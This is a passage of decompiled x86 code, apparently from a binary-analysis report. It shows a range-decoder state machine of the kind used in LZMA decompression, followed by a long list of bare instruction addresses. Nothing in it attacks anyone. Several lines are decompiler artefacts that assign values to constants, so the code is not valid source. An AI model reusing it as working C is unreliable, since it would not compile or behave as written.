                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							_t161 =  &_v116;
                                                                                                                                                                            							 *_t161 = _v116 + 1;
                                                                                                                                                                            							__eflags =  *_t161;
                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								L50:
                                                                                                                                                                            								__eflags = __ebx - 0x100;
                                                                                                                                                                            								if(__ebx >= 0x100) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eax = _v92;
                                                                                                                                                                            								__edx = __ebx + __ebx;
                                                                                                                                                                            								__ecx = _v20;
                                                                                                                                                                            								__esi = __edx + __eax;
                                                                                                                                                                            								__ecx = _v20 >> 0xb;
                                                                                                                                                                            								__ax =  *__esi;
                                                                                                                                                                            								_v88 = __esi;
                                                                                                                                                                            								__edi = __ax & 0x0000ffff;
                                                                                                                                                                            								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                            								__eflags = _v16 - __ecx;
                                                                                                                                                                            								if(_v16 >= __ecx) {
                                                                                                                                                                            									_v20 = _v20 - __ecx;
                                                                                                                                                                            									_v16 = _v16 - __ecx;
                                                                                                                                                                            									__cx = __ax;
                                                                                                                                                                            									_t175 = __edx + 1; // 0x1
                                                                                                                                                                            									__ebx = _t175;
                                                                                                                                                                            									__cx = __ax >> 5;
                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                            									 *__esi = __ax;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_v20 = __ecx;
                                                                                                                                                                            									0x800 = 0x800 - __edi;
                                                                                                                                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            									__ebx = __ebx + __ebx;
                                                                                                                                                                            									 *__esi = __cx;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _v20 - 0x1000000;
                                                                                                                                                                            								_v72 = __ebx;
                                                                                                                                                                            								if(_v20 >= 0x1000000) {
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L48;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							L56:
                                                                                                                                                                            							_t178 =  &_v56;
                                                                                                                                                                            							 *_t178 = _v56 & 0x00000000;
                                                                                                                                                                            							__eflags =  *_t178;
                                                                                                                                                                            							goto L57;
                                                                                                                                                                            						case 0xf:
                                                                                                                                                                            							L60:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 0xf;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							_t208 =  &_v116;
                                                                                                                                                                            							 *_t208 = _v116 + 1;
                                                                                                                                                                            							__eflags =  *_t208;
                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							L62:
                                                                                                                                                                            							__eflags = __ebx - 0x100;
                                                                                                                                                                            							if(__ebx >= 0x100) {
                                                                                                                                                                            								L57:
                                                                                                                                                                            								__al = _v72;
                                                                                                                                                                            								_v96 = _v72;
                                                                                                                                                                            								goto L58;
                                                                                                                                                                            							}
                                                                                                                                                                            							L63:
                                                                                                                                                                            							__eax = _v92;
                                                                                                                                                                            							__edx = __ebx + __ebx;
                                                                                                                                                                            							__ecx = _v20;
                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                            							__ecx = _v20 >> 0xb;
                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                            							_v88 = __esi;
                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                            							__eflags = _v16 - __ecx;
                                                                                                                                                                            							if(_v16 >= __ecx) {
                                                                                                                                                                            								_v20 = _v20 - __ecx;
                                                                                                                                                                            								_v16 = _v16 - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								_t222 = __edx + 1; // 0x1
                                                                                                                                                                            								__ebx = _t222;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v20 = __ecx;
                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                                                                                                            							_v72 = __ebx;
                                                                                                                                                                            							if(_v20 >= 0x1000000) {
                                                                                                                                                                            								goto L62;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L60;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 0x10:
                                                                                                                                                                            							L112:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 0x10;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							_t371 =  &_v116;
                                                                                                                                                                            							 *_t371 = _v116 + 1;
                                                                                                                                                                            							__eflags =  *_t371;
                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							goto L114;
                                                                                                                                                                            						case 0x11:
                                                                                                                                                                            							L71:
                                                                                                                                                                            							__esi = _v92;
                                                                                                                                                                            							_v136 = 0x12;
                                                                                                                                                                            							goto L135;
                                                                                                                                                                            						case 0x12:
                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                            								__eax = _v92;
                                                                                                                                                                            								_v136 = 0x13;
                                                                                                                                                                            								__esi = _v92 + 2;
                                                                                                                                                                            								L135:
                                                                                                                                                                            								_v88 = _t626;
                                                                                                                                                                            								goto L136;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = _v80;
                                                                                                                                                                            							_v52 = _v52 & 0x00000000;
                                                                                                                                                                            							__ecx = _v92;
                                                                                                                                                                            							__eax = _v80 << 4;
                                                                                                                                                                            							__eflags = __eax;
                                                                                                                                                                            							__eax = _v92 + __eax + 4;
                                                                                                                                                                            							goto L133;
                                                                                                                                                                            						case 0x13:
                                                                                                                                                                            							__eflags = _v68;
                                                                                                                                                                            							if(_v68 != 0) {
                                                                                                                                                                            								_t475 =  &_v92;
                                                                                                                                                                            								 *_t475 = _v92 + 0x204;
                                                                                                                                                                            								__eflags =  *_t475;
                                                                                                                                                                            								_v52 = 0x10;
                                                                                                                                                                            								_v68 = 8;
                                                                                                                                                                            								L147:
                                                                                                                                                                            								_v128 = 0x14;
                                                                                                                                                                            								goto L148;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = _v80;
                                                                                                                                                                            							__ecx = _v92;
                                                                                                                                                                            							__eax = _v80 << 4;
                                                                                                                                                                            							_v52 = 8;
                                                                                                                                                                            							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                                                                            							L133:
                                                                                                                                                                            							_v92 = __eax;
                                                                                                                                                                            							_v68 = 3;
                                                                                                                                                                            							goto L147;
                                                                                                                                                                            						case 0x14:
                                                                                                                                                                            							_v52 = _v52 + __ebx;
                                                                                                                                                                            							__eax = _v132;
                                                                                                                                                                            							goto L143;
                                                                                                                                                                            						case 0x15:
                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                            							__eflags = _v60 - 7;
                                                                                                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            							__al = __al & 0x000000fd;
                                                                                                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            							goto L123;
                                                                                                                                                                            						case 0x16:
                                                                                                                                                                            							__eax = _v52;
                                                                                                                                                                            							__eflags = __eax - 4;
                                                                                                                                                                            							if(__eax >= 4) {
                                                                                                                                                                            								_push(3);
                                                                                                                                                                            								_pop(__eax);
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v8;
                                                                                                                                                                            							_v68 = 6;
                                                                                                                                                                            							__eax = __eax << 7;
                                                                                                                                                                            							_v128 = 0x19;
                                                                                                                                                                            							_v92 = __eax;
                                                                                                                                                                            							goto L148;
                                                                                                                                                                            						case 0x17:
                                                                                                                                                                            							L148:
                                                                                                                                                                            							__eax = _v68;
                                                                                                                                                                            							_v84 = 1;
                                                                                                                                                                            							_v76 = _v68;
                                                                                                                                                                            							goto L152;
                                                                                                                                                                            						case 0x18:
                                                                                                                                                                            							L149:
                                                                                                                                                                            							__eflags = _v112;
                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                            								_v140 = 0x18;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v116;
                                                                                                                                                                            							__eax = _v16;
                                                                                                                                                                            							_v20 = _v20 << 8;
                                                                                                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                            							_v112 = _v112 - 1;
                                                                                                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							_t490 =  &_v116;
                                                                                                                                                                            							 *_t490 = _v116 + 1;
                                                                                                                                                                            							__eflags =  *_t490;
                                                                                                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                            							L151:
                                                                                                                                                                            							_t493 =  &_v76;
                                                                                                                                                                            							 *_t493 = _v76 - 1;
                                                                                                                                                                            							__eflags =  *_t493;
                                                                                                                                                                            							L152:
                                                                                                                                                                            							__eflags = _v76;
                                                                                                                                                                            							if(_v76 <= 0) {
                                                                                                                                                                            								__ecx = _v68;
                                                                                                                                                                            								__ebx = _v84;
                                                                                                                                                                            								0 = 1;
                                                                                                                                                                            								__eax = 1 << __cl;
                                                                                                                                                                            								__ebx = _v84 - (1 << __cl);
                                                                                                                                                                            								__eax = _v128;
                                                                                                                                                                            								_v72 = __ebx;
                                                                                                                                                                            								L143:
                                                                                                                                                                            								_v140 = _t561;
                                                                                                                                                                            								goto L3;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = _v84;
                                                                                                                                                                            							_v20 = _v20 >> 0xb;
                                                                                                                                                                            							__edx = _v84 + _v84;
                                                                                                                                                                            							__eax = _v92;
                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                            							_v88 = __esi;
                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                            							__eflags = _v16 - __ecx;
                                                                                                                                                                            							if(_v16 >= __ecx) {
                                                                                                                                                                            								_v20 = _v20 - __ecx;
                                                                                                                                                                            								_v16 = _v16 - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								__eax = __eax - __ecx;
                                                                                                                                                                            								__edx = __edx + 1;
                                                                                                                                                                            								__eflags = __edx;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            								_v84 = __edx;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v20 = __ecx;
                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            								_v84 = _v84 << 1;
                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                                                                                                            							if(_v20 >= 0x1000000) {
                                                                                                                                                                            								goto L151;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L149;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 0x19:
                                                                                                                                                                            							__eflags = __ebx - 4;
                                                                                                                                                                            							if(__ebx < 4) {
                                                                                                                                                                            								_v48 = __ebx;
                                                                                                                                                                            								L122:
                                                                                                                                                                            								_t399 =  &_v48;
                                                                                                                                                                            								 *_t399 = _v48 + 1;
                                                                                                                                                                            								__eflags =  *_t399;
                                                                                                                                                                            								L123:
                                                                                                                                                                            								__eax = _v48;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								if(__eax == 0) {
                                                                                                                                                                            									_v52 = _v52 | 0xffffffff;
                                                                                                                                                                            									goto L173;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = __eax - _v100;
                                                                                                                                                                            								if(__eax > _v100) {
                                                                                                                                                                            									goto L174;
                                                                                                                                                                            								}
                                                                                                                                                                            								_v52 = _v52 + 2;
                                                                                                                                                                            								__eax = _v52;
                                                                                                                                                                            								_t406 =  &_v100;
                                                                                                                                                                            								 *_t406 = _v100 + _v52;
                                                                                                                                                                            								__eflags =  *_t406;
                                                                                                                                                                            								goto L126;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = __ebx;
                                                                                                                                                                            							__eax = __ebx;
                                                                                                                                                                            							__ecx = __ebx >> 1;
                                                                                                                                                                            							__eax = __ebx & 0x00000001;
                                                                                                                                                                            							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                            							__al = __al | 0x00000002;
                                                                                                                                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                            							__eflags = __ebx - 0xe;
                                                                                                                                                                            							_v48 = __eax;
                                                                                                                                                                            							if(__ebx >= 0xe) {
                                                                                                                                                                            								__ebx = 0;
                                                                                                                                                                            								_v76 = __ecx;
                                                                                                                                                                            								L105:
                                                                                                                                                                            								__eflags = _v76;
                                                                                                                                                                            								if(_v76 <= 0) {
                                                                                                                                                                            									__eax = __eax + __ebx;
                                                                                                                                                                            									_v68 = 4;
                                                                                                                                                                            									_v48 = __eax;
                                                                                                                                                                            									__eax = _v8;
                                                                                                                                                                            									__eax = _v8 + 0x644;
                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                            									L111:
                                                                                                                                                                            									__ebx = 0;
                                                                                                                                                                            									_v92 = __eax;
                                                                                                                                                                            									_v84 = 1;
                                                                                                                                                                            									_v72 = 0;
                                                                                                                                                                            									_v76 = 0;
                                                                                                                                                                            									L115:
                                                                                                                                                                            									__eax = _v68;
                                                                                                                                                                            									__eflags = _v76 - _v68;
                                                                                                                                                                            									if(_v76 >= _v68) {
                                                                                                                                                                            										_t397 =  &_v48;
                                                                                                                                                                            										 *_t397 = _v48 + __ebx;
                                                                                                                                                                            										__eflags =  *_t397;
                                                                                                                                                                            										goto L122;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eax = _v84;
                                                                                                                                                                            									_v20 = _v20 >> 0xb;
                                                                                                                                                                            									__edi = _v84 + _v84;
                                                                                                                                                                            									__eax = _v92;
                                                                                                                                                                            									__esi = __edi + __eax;
                                                                                                                                                                            									_v88 = __esi;
                                                                                                                                                                            									__ax =  *__esi;
                                                                                                                                                                            									__ecx = __ax & 0x0000ffff;
                                                                                                                                                                            									__edx = (_v20 >> 0xb) * __ecx;
                                                                                                                                                                            									__eflags = _v16 - __edx;
                                                                                                                                                                            									if(_v16 >= __edx) {
                                                                                                                                                                            										__ecx = 0;
                                                                                                                                                                            										_v20 = _v20 - __edx;
                                                                                                                                                                            										__ecx = 1;
                                                                                                                                                                            										_v16 = _v16 - __edx;
                                                                                                                                                                            										__ebx = 1;
                                                                                                                                                                            										__ecx = _v76;
                                                                                                                                                                            										__ebx = 1 << __cl;
                                                                                                                                                                            										__ecx = 1 << __cl;
                                                                                                                                                                            										__ebx = _v72;
                                                                                                                                                                            										__ebx = _v72 | __ecx;
                                                                                                                                                                            										__cx = __ax;
                                                                                                                                                                            										__cx = __ax >> 5;
                                                                                                                                                                            										__eax = __eax - __ecx;
                                                                                                                                                                            										__edi = __edi + 1;
                                                                                                                                                                            										__eflags = __edi;
                                                                                                                                                                            										_v72 = __ebx;
                                                                                                                                                                            										 *__esi = __ax;
                                                                                                                                                                            										_v84 = __edi;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_v20 = __edx;
                                                                                                                                                                            										0x800 = 0x800 - __ecx;
                                                                                                                                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                            										_v84 = _v84 << 1;
                                                                                                                                                                            										 *__esi = __dx;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags = _v20 - 0x1000000;
                                                                                                                                                                            									if(_v20 >= 0x1000000) {
                                                                                                                                                                            										L114:
                                                                                                                                                                            										_t374 =  &_v76;
                                                                                                                                                                            										 *_t374 = _v76 + 1;
                                                                                                                                                                            										__eflags =  *_t374;
                                                                                                                                                                            										goto L115;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										goto L112;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								__ecx = _v16;
                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                            								_v20 = _v20 >> 1;
                                                                                                                                                                            								__eflags = _v16 - _v20;
                                                                                                                                                                            								_v72 = __ebx;
                                                                                                                                                                            								if(_v16 >= _v20) {
                                                                                                                                                                            									__ecx = _v20;
                                                                                                                                                                            									_v16 = _v16 - _v20;
                                                                                                                                                                            									__ebx = __ebx | 0x00000001;
                                                                                                                                                                            									__eflags = __ebx;
                                                                                                                                                                            									_v72 = __ebx;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _v20 - 0x1000000;
                                                                                                                                                                            								if(_v20 >= 0x1000000) {
                                                                                                                                                                            									L104:
                                                                                                                                                                            									_t344 =  &_v76;
                                                                                                                                                                            									 *_t344 = _v76 - 1;
                                                                                                                                                                            									__eflags =  *_t344;
                                                                                                                                                                            									goto L105;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L102;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__edx = _v8;
                                                                                                                                                                            							__eax = __eax - __ebx;
                                                                                                                                                                            							_v68 = __ecx;
                                                                                                                                                                            							__eax = _v8 + 0x55e + __eax * 2;
                                                                                                                                                                            							goto L111;
                                                                                                                                                                            						case 0x1a:
                                                                                                                                                                            							L58:
                                                                                                                                                                            							__eflags = _v104;
                                                                                                                                                                            							if(_v104 == 0) {
                                                                                                                                                                            								_v140 = 0x1a;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = _v108;
                                                                                                                                                                            							__al = _v96;
                                                                                                                                                                            							__edx = _v12;
                                                                                                                                                                            							_v100 = _v100 + 1;
                                                                                                                                                                            							_v108 = _v108 + 1;
                                                                                                                                                                            							_v104 = _v104 - 1;
                                                                                                                                                                            							 *_v108 = __al;
                                                                                                                                                                            							__ecx = _v24;
                                                                                                                                                                            							 *(_v12 + __ecx) = __al;
                                                                                                                                                                            							__eax = __ecx + 1;
                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                            							_t197 = __eax % _v120;
                                                                                                                                                                            							__eax = __eax / _v120;
                                                                                                                                                                            							__edx = _t197;
                                                                                                                                                                            							goto L82;
                                                                                                                                                                            						case 0x1b:
                                                                                                                                                                            							L78:
                                                                                                                                                                            							__eflags = _v104;
                                                                                                                                                                            							if(_v104 == 0) {
                                                                                                                                                                            								_v140 = 0x1b;
                                                                                                                                                                            								goto L173;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax = _v24;
                                                                                                                                                                            							__eax = _v24 - _v48;
                                                                                                                                                                            							__eflags = __eax - _v120;
                                                                                                                                                                            							if(__eax >= _v120) {
                                                                                                                                                                            								__eax = __eax + _v120;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            							}
                                                                                                                                                                            							__edx = _v12;
                                                                                                                                                                            							__cl =  *(__edx + __eax);
                                                                                                                                                                            							__eax = _v24;
                                                                                                                                                                            							_v96 = __cl;
                                                                                                                                                                            							 *(__edx + __eax) = __cl;
                                                                                                                                                                            							__eax = __eax + 1;
                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                            							_t280 = __eax % _v120;
                                                                                                                                                                            							__eax = __eax / _v120;
                                                                                                                                                                            							__edx = _t280;
                                                                                                                                                                            							__eax = _v108;
                                                                                                                                                                            							_v100 = _v100 + 1;
                                                                                                                                                                            							_v108 = _v108 + 1;
                                                                                                                                                                            							_t289 =  &_v104;
                                                                                                                                                                            							 *_t289 = _v104 - 1;
                                                                                                                                                                            							__eflags =  *_t289;
                                                                                                                                                                            							 *_v108 = __cl;
                                                                                                                                                                            							L82:
                                                                                                                                                                            							_v24 = __edx;
                                                                                                                                                                            							goto L83;
                                                                                                                                                                            						case 0x1c:
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								L126:
                                                                                                                                                                            								__eflags = _v104;
                                                                                                                                                                            								if(_v104 == 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eax = _v24;
                                                                                                                                                                            								__eax = _v24 - _v48;
                                                                                                                                                                            								__eflags = __eax - _v120;
                                                                                                                                                                            								if(__eax >= _v120) {
                                                                                                                                                                            									__eax = __eax + _v120;
                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                            								}
                                                                                                                                                                            								__edx = _v12;
                                                                                                                                                                            								__cl =  *(__edx + __eax);
                                                                                                                                                                            								__eax = _v24;
                                                                                                                                                                            								_v96 = __cl;
                                                                                                                                                                            								 *(__edx + __eax) = __cl;
                                                                                                                                                                            								__eax = __eax + 1;
                                                                                                                                                                            								__edx = 0;
                                                                                                                                                                            								_t420 = __eax % _v120;
                                                                                                                                                                            								__eax = __eax / _v120;
                                                                                                                                                                            								__edx = _t420;
                                                                                                                                                                            								__eax = _v108;
                                                                                                                                                                            								_v108 = _v108 + 1;
                                                                                                                                                                            								_v104 = _v104 - 1;
                                                                                                                                                                            								_v52 = _v52 - 1;
                                                                                                                                                                            								__eflags = _v52;
                                                                                                                                                                            								 *_v108 = __cl;
                                                                                                                                                                            								_v24 = _t420;
                                                                                                                                                                            								if(_v52 > 0) {
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									L83:
                                                                                                                                                                            									_v140 = 2;
                                                                                                                                                                            									goto L3;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_v140 = 0x1c;
                                                                                                                                                                            							L173:
                                                                                                                                                                            							_push(0x22);
                                                                                                                                                                            							_pop(_t574);
                                                                                                                                                                            							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                                                                                                            							return 0;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L174:
                                                                                                                                                                            				_t538 = _t537 | 0xffffffff;
                                                                                                                                                                            				return _t538;
                                                                                                                                                                            			}










































                                                                                                                                                                            0x004061a5
                                                                                                                                                                            0x004061ac
                                                                                                                                                                            0x004061b2
                                                                                                                                                                            0x004061b8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061bc
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061de
                                                                                                                                                                            0x004061e2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061eb
                                                                                                                                                                            0x004061ee
                                                                                                                                                                            0x004061f1
                                                                                                                                                                            0x004061f3
                                                                                                                                                                            0x004061f5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061fb
                                                                                                                                                                            0x004061fe
                                                                                                                                                                            0x00406200
                                                                                                                                                                            0x00406201
                                                                                                                                                                            0x00406204
                                                                                                                                                                            0x00406206
                                                                                                                                                                            0x00406207
                                                                                                                                                                            0x00406209
                                                                                                                                                                            0x0040620c
                                                                                                                                                                            0x00406211
                                                                                                                                                                            0x00406216
                                                                                                                                                                            0x0040621f
                                                                                                                                                                            0x00406232
                                                                                                                                                                            0x00406235
                                                                                                                                                                            0x0040623e
                                                                                                                                                                            0x00406241
                                                                                                                                                                            0x00406269
                                                                                                                                                                            0x00406269
                                                                                                                                                                            0x0040626b
                                                                                                                                                                            0x00406279
                                                                                                                                                                            0x00406279
                                                                                                                                                                            0x0040627d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x00406270
                                                                                                                                                                            0x00406270
                                                                                                                                                                            0x00406271
                                                                                                                                                                            0x00406271
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x00406243
                                                                                                                                                                            0x00406247
                                                                                                                                                                            0x0040624c
                                                                                                                                                                            0x0040624c
                                                                                                                                                                            0x00406255
                                                                                                                                                                            0x0040625b
                                                                                                                                                                            0x0040625d
                                                                                                                                                                            0x00406260
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406283
                                                                                                                                                                            0x00406283
                                                                                                                                                                            0x00406287
                                                                                                                                                                            0x00406b33
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b33
                                                                                                                                                                            0x00406290
                                                                                                                                                                            0x004062a0
                                                                                                                                                                            0x004062a3
                                                                                                                                                                            0x004062a6
                                                                                                                                                                            0x004062a6
                                                                                                                                                                            0x004062a6
                                                                                                                                                                            0x004062a9
                                                                                                                                                                            0x004062a9
                                                                                                                                                                            0x004062ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004062af
                                                                                                                                                                            0x004062b2
                                                                                                                                                                            0x004062b5
                                                                                                                                                                            0x004062df
                                                                                                                                                                            0x004062e5
                                                                                                                                                                            0x004062ec
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004062ec
                                                                                                                                                                            0x004062b7
                                                                                                                                                                            0x004062bb
                                                                                                                                                                            0x004062be
                                                                                                                                                                            0x004062c3
                                                                                                                                                                            0x004062c3
                                                                                                                                                                            0x004062ce
                                                                                                                                                                            0x004062d4
                                                                                                                                                                            0x004062d6
                                                                                                                                                                            0x004062d9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040631e
                                                                                                                                                                            0x00406324
                                                                                                                                                                            0x00406327
                                                                                                                                                                            0x00406334
                                                                                                                                                                            0x0040633c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004062f3
                                                                                                                                                                            0x004062f3
                                                                                                                                                                            0x004062f7
                                                                                                                                                                            0x00406b42
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b42
                                                                                                                                                                            0x00406303
                                                                                                                                                                            0x0040630e
                                                                                                                                                                            0x0040630e
                                                                                                                                                                            0x0040630e
                                                                                                                                                                            0x00406311
                                                                                                                                                                            0x00406314
                                                                                                                                                                            0x00406317
                                                                                                                                                                            0x0040631a
                                                                                                                                                                            0x0040631c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b9
                                                                                                                                                                            0x004069bf
                                                                                                                                                                            0x004069c2
                                                                                                                                                                            0x004069c5
                                                                                                                                                                            0x004069df
                                                                                                                                                                            0x004069e2
                                                                                                                                                                            0x004069e8
                                                                                                                                                                            0x004069f3
                                                                                                                                                                            0x004069f3
                                                                                                                                                                            0x004069f5
                                                                                                                                                                            0x004069c7
                                                                                                                                                                            0x004069c7
                                                                                                                                                                            0x004069d6
                                                                                                                                                                            0x004069da
                                                                                                                                                                            0x004069da
                                                                                                                                                                            0x004069f8
                                                                                                                                                                            0x004069ff
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a01
                                                                                                                                                                            0x00406a01
                                                                                                                                                                            0x00406a05
                                                                                                                                                                            0x00406bb4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bb4
                                                                                                                                                                            0x00406a11
                                                                                                                                                                            0x00406a18
                                                                                                                                                                            0x00406a20
                                                                                                                                                                            0x00406a20
                                                                                                                                                                            0x00406a20
